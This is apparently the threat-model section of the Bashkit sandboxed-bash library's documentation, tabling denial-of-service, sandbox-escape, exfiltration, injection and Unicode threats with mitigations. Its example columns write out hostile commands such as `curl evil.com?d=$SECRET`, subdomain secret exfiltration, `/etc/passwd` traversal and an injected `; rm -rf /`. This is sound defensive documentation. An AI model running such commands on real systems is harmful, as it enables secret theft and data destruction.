Module threat_model

Expand description

Security threat model guide.

This guide documents security threats addressed by Bashkit and their mitigations. All threats use stable IDs for tracking and code references.

Topics covered:

Denial of Service mitigations (TM-DOS-*)
Sandbox escape prevention (TM-ESC-*)
Information disclosure protection (TM-INF-*)
Network security controls (TM-NET-*)
Multi-tenant isolation (TM-ISO-*)

§Threat Model

Bashkit is designed to execute untrusted bash scripts safely in virtual environments. This document describes the security threats we address and how they are mitigated.

See also:

API Documentation - Full API reference
Custom Builtins - Extending Bashkit safely
Compatibility Reference - Supported bash features
Logging Guide - Structured logging with security (TM-LOG-*)

§Overview

Bashkit assumes all script input is potentially malicious. The virtual environment prevents:

Resource exhaustion (CPU, memory, disk)
Sandbox escape (filesystem, process, privilege)
Information disclosure (secrets, host info)
Network abuse (exfiltration, unauthorized access)

§Threat Categories

§Denial of Service (TM-DOS-*)

Scripts may attempt to exhaust system resources. Bashkit mitigates these attacks through configurable limits.

Threat	Attack Example	Mitigation	Code Reference
Large input (TM-DOS-001)	1GB script	`max_input_bytes` limit	`limits.rs`
Infinite loops (TM-DOS-016)	`while true; do :; done`	`max_loop_iterations`	`limits.rs`
Recursion (TM-DOS-020)	`f() { f; }; f`	`max_function_depth`	`limits.rs`
Parser depth (TM-DOS-022)	`(((((...))))))` nesting	`max_ast_depth` + hard cap (100)	`parser/mod.rs`
Command sub depth (TM-DOS-021)	`$($($($())))` nesting	Inherited depth/fuel from parent	`parser/mod.rs`
Arithmetic depth (TM-DOS-026)	`$(((((...))))))`	`MAX_ARITHMETIC_DEPTH` (50)	`interpreter/mod.rs`
Parser attack (TM-DOS-024)	Malformed input	`parser_timeout`	`limits.rs`
Filesystem bomb (TM-DOS-007)	Zip bomb extraction	`FsLimits`	`fs/limits.rs`
Many files (TM-DOS-006)	Create 1M files	`max_file_count`	`fs/limits.rs`
TOCTOU append (TM-DOS-034)	Concurrent appends bypass limits	Single write lock	OPEN
OverlayFs limit gaps (TM-DOS-035-038)	CoW/whiteout/accounting bugs	Combined limit accounting	OPEN
Missing validate_path (TM-DOS-039)	VFS methods skip path checks	Add to all methods	OPEN
Diff algorithm DoS (TM-DOS-028)	`diff` on large unrelated files	LCS matrix cap (10M cells)	`builtins/diff.rs`
Arithmetic overflow (TM-DOS-029)	`$(( 2 ** -1 ))`	Use wrapping arithmetic	OPEN
Parser limit bypass (TM-DOS-030)	eval/source ignore limits	Use `Parser::with_limits()`	OPEN
ExtGlob blowup (TM-DOS-031)	`+(a\|aa)` exponential	Add depth limit	OPEN

Configuration:

use bashkit::{Bash, ExecutionLimits, FsLimits, InMemoryFs};
use std::sync::Arc;
use std::time::Duration;

let limits = ExecutionLimits::new()
    .max_commands(10_000)
    .max_loop_iterations(10_000)
    .max_function_depth(100)
    .timeout(Duration::from_secs(30))
    .max_input_bytes(10_000_000);  // 10MB

let fs_limits = FsLimits::new()
    .max_total_bytes(100_000_000)  // 100MB
    .max_file_size(10_000_000)     // 10MB per file
    .max_file_count(10_000);

let fs = Arc::new(InMemoryFs::with_limits(fs_limits));
let bash = Bash::builder()
    .limits(limits)
    .fs(fs)
    .build();

§Sandbox Escape (TM-ESC-*)

Scripts may attempt to break out of the sandbox to access the host system.

Threat	Attack Example	Mitigation	Code Reference
Path traversal (TM-ESC-001)	`cat /../../../etc/passwd`	Path normalization	`fs/memory.rs`
Symlink escape (TM-ESC-002)	`ln -s /etc/passwd /tmp/x`	Symlinks not followed	`fs/memory.rs`
Shell escape (TM-ESC-005)	`exec /bin/bash`	Not implemented	Returns exit 127
External commands (TM-ESC-006)	`./malicious`	No external exec	Returns exit 127
eval injection (TM-ESC-008)	`eval "$input"`	Sandboxed eval	Only runs builtins
VFS limit bypass (TM-ESC-012)	`add_file()` skips limits	Restrict API visibility	OPEN
Custom builtins lost (TM-ESC-014)	`std::mem::take` empties builtins	Clone/Arc builtins	OPEN

Virtual Filesystem:

Bashkit uses an in-memory virtual filesystem by default. Scripts cannot access the real filesystem unless explicitly mounted via MountableFs.

use bashkit::{Bash, InMemoryFs, MountableFs};
use std::sync::Arc;

// Default: fully isolated in-memory filesystem
let bash = Bash::new();

// Custom filesystem with explicit mounts (advanced)
let root = Arc::new(InMemoryFs::new());
let fs = Arc::new(MountableFs::new(root));
// fs.mount("/data", Arc::new(InMemoryFs::new()));  // Mount additional filesystems

§Information Disclosure (TM-INF-*)

Scripts may attempt to leak sensitive information.

Threat	Attack Example	Mitigation	Code Reference
Env var leak (TM-INF-001)	`echo $SECRET`	Caller responsibility	See below
Host info (TM-INF-005)	`hostname`	Returns virtual value	`builtins/system.rs`
Network exfil (TM-INF-010)	`curl evil.com?d=$SECRET`	Network allowlist	`network/allowlist.rs`
Host env via jq (TM-INF-013)	jq `env` exposes host env	Custom env via `$__bashkit_env__`	FIXED
Real PID leak (TM-INF-014)	`$$` returns real PID	Returns virtual PID (1)	FIXED
Error msg info leak (TM-INF-016)	Errors expose host paths/IPs	Sanitize error messages	OPEN

Caller Responsibility (TM-INF-001):

Do NOT pass sensitive environment variables to untrusted scripts:

// UNSAFE - secrets may be leaked
let bash = Bash::builder()
    .env("DATABASE_URL", "postgres://user:pass@host/db")
    .env("API_KEY", "sk-secret-key")
    .build();

// SAFE - only pass non-sensitive variables
let bash = Bash::builder()
    .env("HOME", "/home/user")
    .env("TERM", "xterm")
    .build();

System Information:

System builtins return configurable virtual values, never real host information:

let bash = Bash::builder()
    .username("sandbox")         // whoami returns "sandbox"
    .hostname("bashkit-sandbox") // hostname returns "bashkit-sandbox"
    .build();

§Network Security (TM-NET-*)

Network access is disabled by default. When enabled, strict controls apply.

Threat	Attack Example	Mitigation	Code Reference
Unauthorized access (TM-NET-004)	`curl http://internal:8080`	URL allowlist	`network/allowlist.rs`
Large response (TM-NET-008)	10GB download	Size limit (10MB)	`network/client.rs`
Redirect bypass (TM-NET-011)	Redirect to evil.com	No auto-redirect	`network/client.rs`
Compression bomb (TM-NET-013)	10KB → 10GB gzip	No auto-decompress	`network/client.rs`

Network Allowlist:

use bashkit::{Bash, NetworkAllowlist};

// Explicit allowlist - only these URLs can be accessed
let allowlist = NetworkAllowlist::new()
    .allow("https://api.example.com")
    .allow("https://cdn.example.com/assets/");

let bash = Bash::builder()
    .network(allowlist)
    .build();

// Scripts can now use curl/wget, but only to allowed URLs
// curl https://api.example.com/data  → allowed
// curl https://evil.com              → blocked (exit 7)

Domain Allowlist (TM-NET-015, TM-NET-016):

For simpler domain-level control, allow_domain() permits all traffic to a domain regardless of scheme, port, or path. This is the virtual equivalent of SNI-based egress filtering — the same approach used by production sandbox environments.

use bashkit::{Bash, NetworkAllowlist};

// Domain-level: any scheme, port, or path to these hosts
let allowlist = NetworkAllowlist::new()
    .allow_domain("api.example.com")
    .allow_domain("cdn.example.com");

// Both of these are allowed:
// curl https://api.example.com/v1/data
// curl http://api.example.com:8080/health

Trade-off: domain rules intentionally skip scheme and port enforcement. Use URL patterns (allow()) when you need tighter control. Both can be combined.

No Wildcard Subdomains (TM-NET-017):

Wildcard patterns like *.example.com are not supported. They would enable data exfiltration by encoding secrets in subdomains (curl https://$SECRET.example.com).

§Injection Attacks (TM-INJ-*)

Threat	Attack Example	Mitigation
Command injection (TM-INJ-001)	`$input` containing `; rm -rf /`	Variables expand to strings only
Path injection (TM-INJ-005)	`../../../../etc/passwd`	Path normalization
Terminal escapes (TM-INJ-008)	ANSI sequences in output	Caller should sanitize
Internal var injection (TM-INJ-009)	Set `_READONLY_X=""`	Isolate internal namespace
Tar path traversal (TM-INJ-010)	`tar -xf` with `../` entries	Validate extract paths
Cyclic nameref (TM-INJ-011)	Cyclic refs resolve silently	Detect cycle, error

Variable Expansion:

Variables expand to literal strings, not re-parsed as commands:

# If user_input contains "; rm -rf /"
user_input="; rm -rf /"
echo $user_input
# Output: "; rm -rf /" (literal string, NOT executed)

§Multi-Tenant Isolation (TM-ISO-*)

Each Bash instance is fully isolated. For multi-tenant environments, create separate instances per tenant:

use bashkit::{Bash, InMemoryFs};
use std::sync::Arc;

// Each tenant gets completely isolated instance
let tenant_a = Bash::builder()
    .fs(Arc::new(InMemoryFs::new()))  // Separate filesystem
    .build();

let tenant_b = Bash::builder()
    .fs(Arc::new(InMemoryFs::new()))  // Different filesystem
    .build();

// tenant_a cannot access tenant_b's files or state

§Internal Error Handling (TM-INT-*)

Bashkit is designed to never crash, even when processing malicious or malformed input. All unexpected errors are caught and converted to safe, human-readable messages.

Threat	Attack Example	Mitigation	Code Reference
Builtin panic (TM-INT-001)	Trigger panic in builtin	`catch_unwind` wrapper	`interpreter/mod.rs`
Info leak in panic (TM-INT-002)	Panic exposes secrets	Sanitized error messages	`interpreter/mod.rs`
Date format crash (TM-INT-003)	Invalid strftime: `+%Q`	Pre-validation	`builtins/date.rs`

Panic Recovery:

All builtins (both built-in and custom) are wrapped with panic catching:

If a builtin panics, the script continues with a sanitized error.
The panic message is NOT exposed (may contain sensitive data).
Output: "bash: <command>: builtin failed unexpectedly"

Error Message Safety:

Error messages never expose:

Stack traces or call stacks
Memory addresses
Real filesystem paths (only virtual paths)
Panic messages that may contain secrets

§Logging Security (TM-LOG-*)

When the logging feature is enabled, Bashkit emits structured logs. Security features prevent sensitive data leakage:

Threat	Attack Example	Mitigation
Secrets in logs (TM-LOG-001)	Log `$PASSWORD` value	Env var redaction
Script leak (TM-LOG-002)	Log script with embedded secrets	Script content disabled by default
URL credentials (TM-LOG-003)	Log `https://user:pass@host`	URL credential redaction
API key leak (TM-LOG-004)	Log JWT or API key values	Entropy-based detection
Log injection (TM-LOG-005)	Script with `\n[ERROR]`	Newline escaping

Logging Configuration:

use bashkit::{Bash, LogConfig};

// Default: secure (redaction enabled, script content hidden)
let bash = Bash::builder()
    .log_config(LogConfig::new())
    .build();

// Add custom redaction patterns
let bash = Bash::builder()
    .log_config(LogConfig::new()
        .redact_env("MY_CUSTOM_SECRET"))
    .build();

Warning: Do not use LogConfig::unsafe_disable_redaction() or LogConfig::unsafe_log_scripts() in production.

§Parser Depth Protection

The parser includes multiple layers of depth protection to prevent stack overflow attacks:

Configurable depth limit (max_ast_depth, default 100): Controls maximum nesting of compound commands (if/for/while/case/subshell).
Hard cap (HARD_MAX_AST_DEPTH = 100): Even if the caller configures a higher max_ast_depth, the parser clamps it to 100. This prevents misconfiguration from causing stack overflow.
Child parser inheritance (TM-DOS-021): When parsing $(...) or <(...), the child parser inherits the remaining depth budget and fuel from the parent. This prevents attackers from bypassing depth limits through nested substitutions.
Arithmetic depth limit (TM-DOS-026): The arithmetic evaluator ($((expr))) has its own depth limit (MAX_ARITHMETIC_DEPTH = 50) to prevent stack overflow from deeply nested parenthesized expressions.
Parser fuel (max_parser_operations, default 100K): Independent of depth, limits total parser work to prevent CPU exhaustion.

§Python / Monty Security (TM-PY-*)

The python/python3 builtins embed the Monty Python interpreter with VFS bridging. Python pathlib.Path operations are bridged to Bashkit’s virtual filesystem.

Threat	Attack Example	Mitigation
Infinite loop (TM-PY-001)	`while True: pass`	Monty time limit (30s) + allocation cap
Memory exhaustion (TM-PY-002)	Large allocation	Monty max_memory (64MB) + max_allocations (1M)
Stack overflow (TM-PY-003)	Deep recursion	Monty max_recursion (200)
Shell escape (TM-PY-004)	`os.system()`	Monty has no os.system/subprocess
Real FS access (TM-PY-005)	`open()`	Monty has no open() builtin
Real FS read (TM-PY-015)	`Path.read_text()`	VFS bridge reads only from BashKit VFS
Real FS write (TM-PY-016)	`Path.write_text()`	VFS bridge writes only to BashKit VFS
Path traversal (TM-PY-017)	`../../etc/passwd`	VFS path normalization
Network access (TM-PY-020)	Socket/HTTP	Monty has no socket/network module
VM crash (TM-PY-022)	Malformed input	Parser depth limit + resource limits
Shell injection (TM-PY-023)	deepagents.py f-strings	Use shlex.quote()
Heredoc escape (TM-PY-024)	Content contains delimiter	Random delimiter
GIL deadlock (TM-PY-025)	execute_sync holds GIL	py.allow_threads()
Config lost on reset (TM-PY-026)	reset() drops limits	Preserve config
JSON recursion (TM-PY-027)	Nested dicts overflow stack	Add depth limit

Architecture:

Python code → Monty VM → OsCall pause → BashKit VFS bridge → resume

Monty runs directly in the host process. Resource limits (memory, allocations, time, recursion) are enforced by Monty’s own runtime. All VFS operations are bridged through the host process — Python code never touches the real filesystem.

§Git Security (TM-GIT-*)

Optional virtual git operations via the git feature. All operations are confined to the virtual filesystem.

Threat	Attack Example	Mitigation	Status
Host identity leak (TM-GIT-002)	Commit reveals real name/email	Configurable virtual identity	MITIGATED
Host git config (TM-GIT-003)	Read ~/.gitconfig	No host filesystem access	MITIGATED
Credential theft (TM-GIT-004)	Access credential store	No host filesystem access	MITIGATED
Repository escape (TM-GIT-005)	Clone outside VFS	All paths in VFS	MITIGATED
Many git objects (TM-GIT-007)	Millions of objects	`max_file_count` FS limit	MITIGATED
Deep history (TM-GIT-008)	Very long commit log	Log limit parameter	MITIGATED
Large pack files (TM-GIT-009)	Huge .git/objects/pack	`max_file_size` FS limit	MITIGATED
Branch name injection (TM-GIT-014)	`git branch ../../config`	Validate branch names	OPEN
Unauthorized clone (TM-GIT-001)	`git clone evil.com`	Remote URL allowlist	PLANNED (Phase 2)
Push to unauthorized (TM-GIT-010)	`git push evil.com`	Remote URL allowlist	PLANNED (Phase 2)

Virtual Identity:

use bashkit::Bash;

let bash = Bash::builder()
    .git_author("sandbox", "sandbox@example.com")
    .build();
// Commits use virtual identity, never host ~/.gitconfig

§Unicode Security (TM-UNI-*)

Unicode input from untrusted scripts creates attack surface across the parser, builtins, and virtual filesystem. AI agents frequently generate multi-byte Unicode (box-drawing, emoji, CJK) that exercises these code paths.

Byte-Boundary Safety (TM-UNI-001/002/015/016/017):

Multiple builtins mix byte offsets with character indices, causing panics on multi-byte input. All are caught by catch_unwind (TM-INT-001) preventing process crash, but the builtin silently fails.

Threat	Attack Example	Mitigation	Status
Awk byte-boundary panic (TM-UNI-001)	Multi-byte chars in awk input	`catch_unwind` catches panic	PARTIAL
Sed byte-boundary panic (TM-UNI-002)	Box-drawing chars in sed pattern	`catch_unwind` catches panic	PARTIAL
Expr substr panic (TM-UNI-015)	`expr substr "café" 4 1`	`catch_unwind` catches panic	PARTIAL
Printf precision panic (TM-UNI-016)	`printf "%.1s" "é"`	`catch_unwind` catches panic	PARTIAL
Cut/tr byte-level parsing (TM-UNI-017)	`tr 'é' 'e'` — multi-byte in char set	`catch_unwind` catches; silent data loss	PARTIAL

Additional Byte/Char Confusion:

Threat	Attack Example	Mitigation	Status
Interpreter arithmetic (TM-UNI-018)	Multi-byte before `=` in arithmetic	Wrong operator detection; no panic	PARTIAL
Network allowlist (TM-UNI-019)	Multi-byte in allowlist URL path	Wrong path boundary check	PARTIAL
Zero-width in filenames (TM-UNI-003)	Invisible chars create confusable names	Path validation (planned)	UNMITIGATED
Homoglyph confusion (TM-UNI-006)	Cyrillic ‘а’ vs Latin ‘a’ in filenames	Accepted risk	ACCEPTED
Normalization bypass (TM-UNI-008)	NFC vs NFD create distinct files	Matches Linux FS behavior	ACCEPTED
Bidi in script source (TM-UNI-014)	RTL overrides hide malicious code	Scripts untrusted by design	ACCEPTED

Safe Components (confirmed by full codebase audit):

Lexer: Chars iterator with ch.len_utf8() tracking
wc: Correct .len() vs .chars().count() usage
grep/jq: Delegate to Unicode-aware regex/jaq crates
sort/uniq: String comparison, no byte indexing
logging: Uses is_char_boundary() correctly
python: Shebang strip via find('\n') — ASCII delimiter, safe
Python bindings (bashkit-python): PyO3 String extraction, no manual byte/char ops
eval harness: chars().take(), from_utf8_lossy() — all safe patterns
curl/bc/export/date/comm/echo/archive/base64: All .find() use ASCII delimiters only
scripted_tool: No byte/char patterns

Path Validation:

Filenames are validated by find_unsafe_path_char() which rejects:

ASCII control characters (U+0000-U+001F, U+007F)
C1 control characters (U+0080-U+009F)
Bidi override characters (U+202A-U+202E, U+2066-U+2069)

Normal Unicode (accented, CJK, emoji) is allowed in filenames and script content.

Caller Responsibility:

Strip zero-width/invisible characters from filenames before displaying to users
Apply confusable-character detection (UTS #39) if showing filenames to humans
Strip bidi overrides from script source before displaying to code reviewers
Be aware that expr/printf/cut/tr may fail on non-ASCII input until fixes land
Use ASCII in network allowlist URL patterns until byte/char fix lands

§Security Testing

Bashkit includes comprehensive security tests:

Threat Model Tests: tests/threat_model_tests.rs - 117 tests
Unicode Security Tests: tests/unicode_security_tests.rs - TM-UNI-* tests
Nesting Depth Tests: 18 tests covering positive, negative, misconfiguration, and regression scenarios for parser depth attacks
Fail-Point Tests: tests/security_failpoint_tests.rs - 14 tests
Network Security: tests/network_security_tests.rs - 53 tests
Builtin Error Security: tests/builtin_error_security_tests.rs - 39 tests
Logging Security: tests/logging_security_tests.rs - 26 tests
Git Security: tests/git_security_tests.rs + tests/git_remote_security_tests.rs
Fuzz Testing: fuzz/ - Parser and lexer fuzzing

§Reporting Security Issues

If you discover a security vulnerability, please report it privately via GitHub Security Advisories rather than opening a public issue.

§Threat ID Reference

All threats use stable IDs in the format TM-<CATEGORY>-<NUMBER>:

Prefix	Category
TM-DOS	Denial of Service
TM-ESC	Sandbox Escape
TM-INF	Information Disclosure
TM-INJ	Injection
TM-NET	Network Security
TM-ISO	Multi-Tenant Isolation
TM-INT	Internal Error Handling
TM-LOG	Logging Security
TM-GIT	Git Security
TM-PY	Python/Monty Security
TM-UNI	Unicode Security

Full threat analysis: specs/006-threat-model.md